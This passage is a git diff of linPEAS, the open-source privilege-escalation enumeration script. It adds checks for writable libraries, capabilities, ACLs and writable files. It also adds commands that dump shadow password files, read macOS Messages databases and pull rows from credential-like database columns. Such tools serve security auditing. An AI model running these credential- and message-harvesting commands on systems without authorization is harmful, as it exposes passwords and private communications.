"$STRINGS" ]; then + $STRINGS "$sname" | sort | uniq | while read sline; do + sline_first="$(echo $sline | cut -d ' ' -f1)" + if echo "$sline_first" | grep -qEv "$cfuncs"; then + if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path + if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable + printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline)\n" + fi + else #If not a path + if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/'; then #Check if existing binary + printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline)\n" + fi + fi + fi + done + fi + + if [ "$LDD" ] || [ "$READELF" ]; then + echo "$ITALIC --- Checking for writable dependencies of $sname...$NC" + fi + if [ "$LDD" ]; then + "$LDD" "$sname" | grep -E "$Wfolders" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" + fi + if [ "$READELF" ]; then + "$READELF" -d "$sname" | grep PATH | grep -E "$Wfolders" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" + fi + + if [ "$TIMEOUT" ] && [ "$STRACE" ] && [ ! "$SUPERFAST" ]; then + printf "$ITALIC" + echo " --- Trying to execute $sname with strace in order to look for hijackable libraries..." + timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g" + printf "$NC" + echo "" + fi + + fi + fi + fi + fi +done; +echo "" + +##-- IPF) Misconfigured ld.so +if ! [ "$SEARCH_IN_FOLDER" ] && ! [ "$IAMROOT" ]; then + print_2title "Checking misconfigurations of ld.so" + print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#ld-so" + if [ -f "/etc/ld.so.conf" ] && [ -w "/etc/ld.so.conf" ]; then + echo "You have write privileges over /etc/ld.so.conf" | sed -${E} "s,.*,${SED_RED_YELLOW},"; + printf $RED$ITALIC"/etc/ld.so.conf\n"$NC; + else + printf $GREEN$ITALIC"/etc/ld.so.conf\n"$NC; + fi + + echo "Content of /etc/ld.so.conf:" + cat /etc/ld.so.conf 2>/dev/null | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" + + # Check each configured folder + cat /etc/ld.so.conf 2>/dev/null | while read l; do + if echo "$l" | grep -q include; then + ini_path=$(echo "$l" | cut -d " " -f 2) + fpath=$(dirname "$ini_path") + + if [ -d "/etc/ld.so.conf" ] && [ -w "$fpath" ]; then + echo "You have write privileges over $fpath" | sed -${E} "s,.*,${SED_RED_YELLOW},"; + printf $RED_YELLOW$ITALIC"$fpath\n"$NC; + else + printf $GREEN$ITALIC"$fpath\n"$NC; + fi + + if [ "$(find $fpath -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then + echo "You have write privileges over $(find $fpath -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW},"; + fi + + for f in $fpath/*; do + if [ -w "$f" ]; then + echo "You have write privileges over $f" | sed -${E} "s,.*,${SED_RED_YELLOW},"; + printf $RED_YELLOW$ITALIC"$f\n"$NC; + else + printf $GREEN$ITALIC" $f\n"$NC; + fi + + cat "$f" | grep -v "^#" | while read l2; do + if [ -f "$l2" ] && [ -w "$l2" ]; then + echo "You have write privileges over $l2" | sed -${E} "s,.*,${SED_RED_YELLOW},"; + printf $RED_YELLOW$ITALIC" - $l2\n"$NC; + else + echo $ITALIC" - $l2"$NC | sed -${E} "s,$l2,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g"; + fi + done + done + fi + done + echo "" + + + if [ -f "/etc/ld.so.preload" ] && [ -w "/etc/ld.so.preload" ]; then + echo "You have write privileges over /etc/ld.so.preload" | sed -${E} "s,.*,${SED_RED_YELLOW},"; + else + printf $ITALIC$GREEN"/etc/ld.so.preload\n"$NC; + fi + cat /etc/ld.so.preload 2>/dev/null | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" + cat /etc/ld.so.preload 2>/dev/null | while read l; do + if [ -f "$l" ] && [ -w "$l" ]; then echo "You have write privileges over $l" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + done + +fi + +##-- IPF) Capabilities +if ! [ "$SEARCH_IN_FOLDER" ]; then + print_2title "Capabilities" + print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities" + if [ "$(command -v capsh)" ]; then + + print_3title "Current shell capabilities" + cat "/proc/$$/status" | grep Cap | while read -r cap_line; do + cap_name=$(echo "$cap_line" | awk '{print $1}') + cap_value=$(echo "$cap_line" | awk '{print $2}') + if [ "$cap_name" = "CapEff:" ]; then + echo "$cap_name $(capsh --decode=0x"$cap_value" | sed -${E} "s,$capsB,${SED_RED_YELLOW},")" + else + echo "$cap_name $(capsh --decode=0x"$cap_value" | sed -${E} "s,$capsB,${SED_RED},")" + fi + done + echo "" + + print_3title "Parent process capabilities" + cat "/proc/$PPID/status" | grep Cap | while read -r cap_line; do + cap_name=$(echo "$cap_line" | awk '{print $1}') + cap_value=$(echo "$cap_line" | awk '{print $2}') + if [ "$cap_name" = "CapEff:" ]; then + echo "$cap_name $(capsh --decode=0x"$cap_value" | sed -${E} "s,$capsB,${SED_RED_YELLOW},")" + else + echo "$cap_name $(capsh --decode=0x"$cap_value" | sed -${E} "s,$capsB,${SED_RED},")" + fi + done + echo "" + + else + print_3title "Current shell capabilities" + (cat "/proc/$$/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$$/status" + echo "" + + print_3title "Parent proc capabilities" + (cat "/proc/$PPID/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$PPID/status" + echo "" + fi + echo "" + echo "Files with capabilities (limited to 50):" + getcap -r / 2>/dev/null | head -n 50 | while read cb; do + capsVB_vuln="" + + for capVB in $capsVB; do + capname="$(echo $capVB | cut -d ':' -f 1)" + capbins="$(echo $capVB | cut -d ':' -f 2)" + if [ "$(echo $cb | grep -Ei $capname)" ] && [ "$(echo $cb | grep -E $capbins)" ]; then + echo "$cb" | sed -${E} "s,.*,${SED_RED_YELLOW}," + capsVB_vuln="1" + break + fi + done + + if ! [ "$capsVB_vuln" ]; then + echo "$cb" | sed -${E} "s,$capsB,${SED_RED}," + fi + + if ! [ "$IAMROOT" ] && [ -w "$(echo $cb | cut -d" " -f1)" ]; then + echo "$cb is writable" | sed -${E} "s,.*,${SED_RED}," + fi + done + echo "" +fi + +##-- IPF) Users with capabilities +if [ -f "/etc/security/capability.conf" ] || [ "$DEBUG" ]; then + print_2title "Users with capabilities" + print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities" + if [ -f "/etc/security/capability.conf" ]; then + grep -v '^#\|none\|^$' /etc/security/capability.conf 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," + else echo_not_found "/etc/security/capability.conf" + fi + echo "" +fi + +##-- IPF) AppArmor profiles to prevent suid/capabilities abuse +if ! [ "$SEARCH_IN_FOLDER" ]; then + if [ -d "/etc/apparmor.d/" ] && [ -r "/etc/apparmor.d/" ]; then + print_2title "AppArmor binary profiles" + ls -l /etc/apparmor.d/ 2>/dev/null | grep -E "^-" | grep "\." + echo "" + fi +fi + +##-- IPF) Files with ACLs +print_2title "Files with ACLs (limited to 50)" +print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#acls" +if ! [ "$SEARCH_IN_FOLDER" ]; then + ( (getfacl -t -s -R -p /bin /etc $HOMESEARCH /opt /sbin /usr /tmp /root 2>/dev/null) || echo_not_found "files with acls in searched folders" ) | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," +else + ( (getfacl -t -s -R -p $SEARCH_IN_FOLDER 2>/dev/null) || echo_not_found "files with acls in searched folders" ) | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," +fi + +if [ "$MACPEAS" ] && ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && ! [ "$(command -v getfacl)" ]; then #Find ACL files in macos (veeeery slow) + ls -RAle / 2>/dev/null | grep -v "group:everyone deny delete" | grep -E -B1 "\d: " | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," +fi +echo "" + +##-- IPF) Files with ResourceFork +#if [ "$MACPEAS" ] && ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then # TOO SLOW, CHECK IT LATER +# print_2title "Files with ResourceFork" +# print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#resource-forks-or-macos-ads" +# find $HOMESEARCH -type f -exec ls -ld {} \; 2>/dev/null | grep -E ' [x\-]@ ' | awk '{printf $9; printf "\n"}' | xargs -I {} xattr -lv {} | grep "com.apple.ResourceFork" +#fi +#echo "" + +##-- IPF) Files (scripts) in /etc/profile.d/ +if ! [ "$SEARCH_IN_FOLDER" ]; then + print_2title "Files (scripts) in /etc/profile.d/" + print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#profiles-files" + if [ ! "$MACPEAS" ] && ! [ "$IAMROOT" ]; then #Those folders don´t exist on a MacOS + (ls -la /etc/profile.d/ 2>/dev/null | sed -${E} "s,$profiledG,${SED_GREEN},") || echo_not_found "/etc/profile.d/" + check_critial_root_path "/etc/profile" + check_critial_root_path "/etc/profile.d/" + fi + echo "" +fi + + ##-- IPF) Files (scripts) in /etc/init.d/ + if ! [ "$SEARCH_IN_FOLDER" ]; then +print_2title "Permissions in init, init.d, systemd, and rc.d" + print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#init-init-d-systemd-and-rc-d" + if [ ! "$MACPEAS" ] && ! [ "$IAMROOT" ]; then #Those folders don´t exist on a MacOS + check_critial_root_path "/etc/init/" + check_critial_root_path "/etc/init.d/" + check_critial_root_path "/etc/rc.d/init.d" + check_critial_root_path "/usr/local/etc/rc.d" + check_critial_root_path "/etc/rc.d" + check_critial_root_path "/etc/systemd/" + check_critial_root_path "/lib/systemd/" + fi + + echo "" +fi + + + +##-- IPF) Hashes in passwd file +if ! [ "$SEARCH_IN_FOLDER" ]; then + print_list "Hashes inside passwd file? ........... " + if grep -qv '^[^:]*:[x\*\!]\|^#\|^$' /etc/passwd /etc/master.passwd /etc/group 2>/dev/null; then grep -v '^[^:]*:[x\*]\|^#\|^$' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null | sed -${E} "s,.*,${SED_RED}," + else echo_no + fi + + ##-- IPF) Writable in passwd file + print_list "Writable passwd file? ................ " + if [ -w "/etc/passwd" ]; then echo "/etc/passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," + elif [ -w "/etc/pwd.db" ]; then echo "/etc/pwd.db is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," + elif [ -w "/etc/master.passwd" ]; then echo "/etc/master.passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," + else echo_no + fi + + ##-- IPF) Credentials in fstab + print_list "Credentials in fstab/mtab? ........... " + if grep -qE "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null; then grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null | sed -${E} "s,.*,${SED_RED}," + else echo_no + fi + + ##-- IPF) Read shadow files + print_list "Can I read shadow files? ............. " + if [ "$(cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null)" ]; then cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null | sed -${E} "s,.*,${SED_RED}," + else echo_no + fi + + print_list "Can I read shadow plists? ............ " + possible_check="" + (for l in /var/db/dslocal/nodes/Default/users/*; do if [ -r "$l" ];then echo "$l"; defaults read "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no + + print_list "Can I write shadow plists? ........... " + possible_check="" + (for l in /var/db/dslocal/nodes/Default/users/*; do if [ -w "$l" ];then echo "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no + + ##-- IPF) Read opasswd file + print_list "Can I read opasswd file? ............. " + if [ -r "/etc/security/opasswd" ]; then cat /etc/security/opasswd 2>/dev/null || echo "" + else echo_no + fi + + ##-- IPF) network-scripts + print_list "Can I write in network-scripts? ...... " + if ! [ "$IAMROOT" ] && [ -w "/etc/sysconfig/network-scripts/" ]; then echo "You have write privileges on /etc/sysconfig/network-scripts/" | sed -${E} "s,.*,${SED_RED_YELLOW}," + elif [ "$(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges on $(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW}," + else echo_no + fi + + ##-- IPF) Read root dir + print_list "Can I read root folder? .............. " + (ls -al /root/ 2>/dev/null | grep -vi "total 0") || echo_no + echo "" +fi + +##-- IPF) Root files in home dirs +if ! [ "$SEARCH_IN_FOLDER" ]; then + print_2title "Searching root files in home dirs (limit 30)" + (find $HOMESEARCH -user root 2>/dev/null | head -n 30 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g") || echo_not_found + echo "" +fi + +##-- IPF) Others files in my dirs +if ! [ "$IAMROOT" ]; then + print_2title "Searching folders owned by me containing others files on it (limit 100)" + (find $ROOT_FOLDER -type d -user "$USER" ! -path "/proc/*" ! -path "/sys/*" 2>/dev/null | head -n 100 | while read d; do find "$d" -maxdepth 1 ! -user "$USER" \( -type f -or -type d \) -exec ls -l {} \; 2>/dev/null; done) | sort | uniq | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${C}[1;13m&${C}[0m,g" + echo "" +fi + +##-- IPF) Readable files belonging to root and not world readable +if ! [ "$IAMROOT" ]; then + print_2title "Readable files belonging to root and readable by me but not world readable" + (find $ROOT_FOLDER -type f -user root ! -perm -o=r ! -path "/proc/*" 2>/dev/null | grep -v "\.journal" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null | sed -${E} "s,/.*,${SED_RED},"; fi; done) || echo_not_found + echo "" +fi + +##-- IPF) Interesting writable files by ownership or all +if ! [ "$IAMROOT" ]; then + print_2title "Interesting writable files owned by me or writable by everyone (not in Home) (max 500)" + print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files" + #In the next file, you need to specify type "d" and "f" to avoid fake link files apparently writable by all + obmowbe=$(find $ROOT_FOLDER '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | sort | uniq | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500) + printf "%s\n" "$obmowbe" | while read entry; do + if echo "$entry" | grep -q "You_can_write_even_more_files_inside_last_directory"; then printf $ITALIC"$entry\n"$NC; + elif echo "$entry" | grep -qE "$writeVB"; then + echo "$entry" | sed -${E} "s,$writeVB,${SED_RED_YELLOW}," + else + echo "$entry" | sed -${E} "s,$writeB,${SED_RED}," + fi + done + echo "" +fi + +##-- IPF) Interesting writable files by group +if ! [ "$IAMROOT" ]; then + print_2title "Interesting GROUP writable files (not in Home) (max 500)" + print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files" + for g in $(groups); do + iwfbg=$(find $ROOT_FOLDER '(' -type f -or -type d ')' -group $g -perm -g=w ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500) + if [ "$iwfbg" ] || [ "$DEBUG" ]; then + printf " Group $GREEN$g:\n$NC"; + printf "%s\n" "$iwfbg" | while read entry; do + if echo "$entry" | grep -q "You_can_write_even_more_files_inside_last_directory"; then printf $ITALIC"$entry\n"$NC; + elif echo "$entry" | grep -Eq "$writeVB"; then + echo "$entry" | sed -${E} "s,$writeVB,${SED_RED_YELLOW}," + else + echo "$entry" | sed -${E} "s,$writeB,${SED_RED}," + fi + done + fi + done + echo "" +fi \ No newline at end of file diff --git a/linPEAS/builder/linpeas_parts/9_api_keys_regex.sh b/linPEAS/builder/linpeas_parts/9_api_keys_regex.sh deleted file mode 100644 index cb3ec34..0000000 --- a/linPEAS/builder/linpeas_parts/9_api_keys_regex.sh +++ /dev/null @@ -1,6 +0,0 @@ - -if [ "$REGEXES" ] && [ "$TIMEOUT" ]; then - peass{REGEXES} -else - echo "Regexes to search for API keys aren't activated, use param '-r' " -fi \ No newline at end of file diff --git a/linPEAS/builder/linpeas_parts/9_interesting_files.sh b/linPEAS/builder/linpeas_parts/9_interesting_files.sh new file mode 100644 index 0000000..a6e19f3 --- /dev/null +++ b/linPEAS/builder/linpeas_parts/9_interesting_files.sh @@ -0,0 +1,315 @@ +########################################### +#----------) Interesting files (----------# +########################################### + + +##-- IF) .sh files in PATH +if ! [ "$SEARCH_IN_FOLDER" ]; then + print_2title ".sh files in path" + print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#script-binaries-in-path" + echo $PATH | tr ":" "\n" | while read d; do + for f in $(find "$d" -name "*.sh" -o -name "*.sh.*" 2>/dev/null); do + if ! [ "$IAMROOT" ] && [ -O "$f" ]; then + echo "You own the script: $f" | sed -${E} "s,.*,${SED_RED}," + elif ! [ "$IAMROOT" ] && [ -w "$f" ]; then #If write permision, win found (no check exploits) + echo "You can write script: $f" | sed -${E} "s,.*,${SED_RED_YELLOW}," + else + echo $f | sed -${E} "s,$shscripsG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED},"; + fi + done + done + echo "" + + broken_links=$(find "$d" -type l 2>/dev/null | xargs file 2>/dev/null | grep broken) + if [ "$broken_links" ] || [ "$DEBUG" ]; then + print_2title "Broken links in path" + echo $PATH | tr ":" "\n" | while read d; do + find "$d" -type l 2>/dev/null | xargs file 2>/dev/null | grep broken | sed -${E} "s,broken,${SED_RED},"; + done + echo "" + fi +fi + +##-- IF) Date times inside firmware +if [ "$SEARCH_IN_FOLDER" ]; then + print_2title "Files datetimes inside the firmware (limit 50)" + find "$SEARCH_IN_FOLDER" -type f -printf "%T+\n" 2>/dev/null | sort | uniq -c | sort | head -n 50 + echo "To find a file with an specific date execute: find \"$SEARCH_IN_FOLDER\" -type f -printf \"%T+ %p\n\" 2>/dev/null | grep \"\"" + echo "" +fi + +##-- IF) Executable files added by user +print_2title "Executable files potentially added by user (limit 70)" +if ! [ "$SEARCH_IN_FOLDER" ]; then + find / -type f -executable -printf "%T+ %p\n" 2>/dev/null | grep -Ev "000|/site-packages|/python|/node_modules|\.sample|/gems|/cgroup/" | sort -r | head -n 70 +else + find "$SEARCH_IN_FOLDER" -type f -executable -printf "%T+ %p\n" 2>/dev/null | grep -Ev "/site-packages|/python|/node_modules|\.sample|/gems|/cgroup/" | sort -r | head -n 70 +fi +echo "" + + + +if [ "$MACPEAS" ]; then + print_2title "Unsigned Applications" + macosNotSigned /System/Applications +fi + +##-- IF) Unexpected in /opt +if ! [ "$SEARCH_IN_FOLDER" ]; then + if [ "$(ls /opt 2>/dev/null)" ]; then + print_2title "Unexpected in /opt (usually empty)" + ls -la /opt + echo "" + fi +fi + +##-- IF) Unexpected folders in / +if ! [ "$SEARCH_IN_FOLDER" ]; then + print_2title "Unexpected in root" + if [ "$MACPEAS" ]; then + (find $ROOT_FOLDER -maxdepth 1 | grep -Ev "$commonrootdirsMacG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found + else + (find $ROOT_FOLDER -maxdepth 1 | grep -Ev "$commonrootdirsG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found + fi + echo "" +fi + +##-- IF) Modified interesting files into specific folders in the last 5mins +print_2title "Modified interesting files in the last 5mins (limit 100)" +find $ROOT_FOLDER -type f -mmin -5 ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" ! -path "/dev/*" ! -path "/var/lib/*" ! -path "/private/var/*" 2>/dev/null | grep -v "/linpeas" | head -n 100 | sed -${E} "s,$Wfolders,${SED_RED}," +echo "" + +##-- IF) Writable log files +if command -v logrotate >/dev/null && logrotate --version | head -n 1 | grep -Eq "[012]\.[0-9]+\.|3\.[0-9]\.|3\.1[0-7]\.|3\.18\.0"; then #3.18.0 and below +print_2title "Writable log files (logrotten) (limit 50)" + print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#logrotate-exploitation" + logrotate --version 2>/dev/null || echo_not_found "logrotate" + lastWlogFolder="ImPOsSiBleeElastWlogFolder" + logfind=$(find $ROOT_FOLDER -type f -name "*.log" -o -name "*.log.*" 2>/dev/null | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 3){ print line_init; }; if (cont == "3"){print "#)You_can_write_more_log_files_inside_last_directory"}; pre=act}' | head -n 50) + printf "%s\n" "$logfind" | while read log; do + if ! [ "$IAMROOT" ] && [ "$log" ] && [ -w "$log" ] || ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders"; then #Only print info if something interesting found + if echo "$log" | grep -q "You_can_write_more_log_files_inside_last_directory"; then printf $ITALIC"$log\n"$NC; + elif ! [ "$IAMROOT" ] && [ -w "$log" ] && [ "$(command -v logrotate 2>/dev/null)" ] && logrotate --version 2>&1 | grep -qE ' 1| 2| 3.1'; then printf "Writable:$RED $log\n"$NC; #Check vuln version of logrotate is used and print red in that case + elif ! [ "$IAMROOT" ] && [ -w "$log" ]; then echo "Writable: $log"; + elif ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders" && [ "$log" ] && [ ! "$lastWlogFolder" == "$log" ]; then lastWlogFolder="$log"; echo "Writable folder: $log" | sed -${E} "s,$Wfolders,${SED_RED},g"; + fi + fi + done +fi + +echo "" + +if ! [ "$SEARCH_IN_FOLDER" ]; then + ##-- IF) Files inside my home + print_2title "Files inside $HOME (limit 20)" + (ls -la $HOME 2>/dev/null | head -n 23) || echo_not_found + echo "" + + ##-- IF) Files inside /home + print_2title "Files inside others home (limit 20)" + (find $HOMESEARCH -type f 2>/dev/null | grep -v -i "/"$USER | head -n 20) || echo_not_found + echo "" + + ##-- IF) Mail applications + print_2title "Searching installed mail applications" + ls /bin /sbin /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin /etc 2>/dev/null | grep -Ewi "$mail_apps" | sort | uniq + echo "" + + ##-- IF) Mails + print_2title "Mails (limit 50)" + (find /var/mail/ /var/spool/mail/ /private/var/mail -type f -ls 2>/dev/null | head -n 50 | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_GREEN},g" | sed "s,$USER,${SED_RED},g") || echo_not_found + echo "" + + ##-- IF) Backup folders + if [ "$backup_folders" ] || [ "$DEBUG" ]; then + print_2title "Backup folders" + printf "%s\n" "$backup_folders" | while read b ; do + ls -ld "$b" 2> /dev/null | sed -${E} "s,backups|backup,${SED_RED},g"; + ls -l "$b" 2>/dev/null && echo "" + done + echo "" + fi +fi + +##-- IF) Backup files +print_2title "Backup files (limited 100)" +backs=$(find $ROOT_FOLDER -type f \( -name "*backup*" -o -name "*\.bak" -o -name "*\.bak\.*" -o -name "*\.bck" -o -name "*\.bck\.*" -o -name "*\.bk" -o -name "*\.bk\.*" -o -name "*\.old" -o -name "*\.old\.*" \) -not -path "/proc/*" 2>/dev/null) +printf "%s\n" "$backs" | head -n 100 | while read b ; do + if [ -r "$b" ]; then + ls -l "$b" | grep -Ev "$notBackup" | grep -Ev "$notExtensions" | sed -${E} "s,backup|bck|\.bak|\.old,${SED_RED},g"; + fi; +done +echo "" + +##-- IF) DB files +if [ "$MACPEAS" ]; then + print_2title "Reading messages database" + sqlite3 $HOME/Library/Messages/chat.db 'select * from message' 2>/dev/null + sqlite3 $HOME/Library/Messages/chat.db 'select * from attachment' 2>/dev/null + sqlite3 $HOME/Library/Messages/chat.db 'select * from deleted_messages' 2>/dev/null + +fi + + +if [ "$PSTORAGE_DATABASE" ] || [ "$DEBUG" ]; then + print_2title "Searching tables inside readable .db/.sql/.sqlite files (limit 100)" + FILECMD="$(command -v file 2>/dev/null)" + printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do + if [ "$FILECMD" ]; then + echo "Found "$(file "$f") | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g"; + else + echo "Found $f" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g"; + fi + done + SQLITEPYTHON="" + echo "" + printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do + if ([ -r "$f" ] && [ "$FILECMD" ] && file "$f" | grep -qi sqlite) || ([ -r "$f" ] && [ ! "$FILECMD" ]); then #If readable and filecmd and sqlite, or readable and not filecmd + if [ "$(command -v sqlite3 2>/dev/null)" ]; then + tables=$(sqlite3 $f ".tables" 2>/dev/null) + #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g" + elif [ "$(command -v python 2>/dev/null)" ] || [ "$(command -v python3 2>/dev/null)" ]; then + SQLITEPYTHON=$(command -v python 2>/dev/null || command -v python3 2>/dev/null) + tables=$($SQLITEPYTHON -c "print('\n'.join([t[0] for t in __import__('sqlite3').connect('$f').cursor().execute('SELECT name FROM sqlite_master WHERE type=\'table\' and tbl_name NOT like \'sqlite_%\';').fetchall()]))" 2>/dev/null) + #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g" + else + tables="" + fi + if [ "$tables" ] || [ "$DEBUG" ]; then + printf $GREEN" -> Extracting tables from$NC $f $DG(limit 20)\n"$NC + printf "%s\n" "$tables" | while read t; do + columns="" + # Search for credentials inside the table using sqlite3 + if [ -z "$SQLITEPYTHON" ]; then + columns=$(sqlite3 $f ".schema $t" 2>/dev/null | grep "CREATE TABLE") + # Search for credentials inside the table using python + else + columns=$($SQLITEPYTHON -c "print(__import__('sqlite3').connect('$f').cursor().execute('SELECT sql FROM sqlite_master WHERE type!=\'meta\' AND sql NOT NULL AND name =\'$t\';').fetchall()[0][0])" 2>/dev/null) + fi + #Check found columns for interesting fields + INTCOLUMN=$(echo "$columns" | grep -i "username\|passw\|credential\|email\|hash\|salt") + if [ "$INTCOLUMN" ]; then + printf ${BLUE}" --> Found interesting column names in$NC $t $DG(output limit 10)\n"$NC | sed -${E} "s,user.*|credential.*,${SED_RED},g" + printf "$columns\n" | sed -${E} "s,username|passw|credential|email|hash|salt|$t,${SED_RED},g" + (sqlite3 $f "select * from $t" || $SQLITEPYTHON -c "print(', '.join([str(x) for x in __import__('sqlite3').connect('$f').cursor().execute('SELECT * FROM \'$t\';').fetchall()[0]]))") 2>/dev/null | head + echo "" + fi + done + fi + fi + done +fi +echo "" + +if [ "$MACPEAS" ]; then + print_2title "Downloaded Files" + sqlite3 ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2 'select LSQuarantineAgentName, LSQuarantineDataURLString, LSQuarantineOriginURLString, date(LSQuarantineTimeStamp + 978307200, "unixepoch") as downloadedDate from LSQuarantineEvent order by LSQuarantineTimeStamp' | sort | grep -Ev "\|\|\|" +fi + +##-- IF) Web files +if ! [ "$SEARCH_IN_FOLDER" ]; then + print_2title "Web files?(output limit)" + ls -alhR /var/www/ 2>/dev/null | head + ls -alhR /srv/www/htdocs/ 2>/dev/null | head + ls -alhR /usr/local/www/apache22/data/ 2>/dev/null | head + ls -alhR /opt/lampp/htdocs/ 2>/dev/null | head + echo "" +fi + +##-- IF) All hidden files +print_2title "All relevant hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)" +find $ROOT_FOLDER -type f 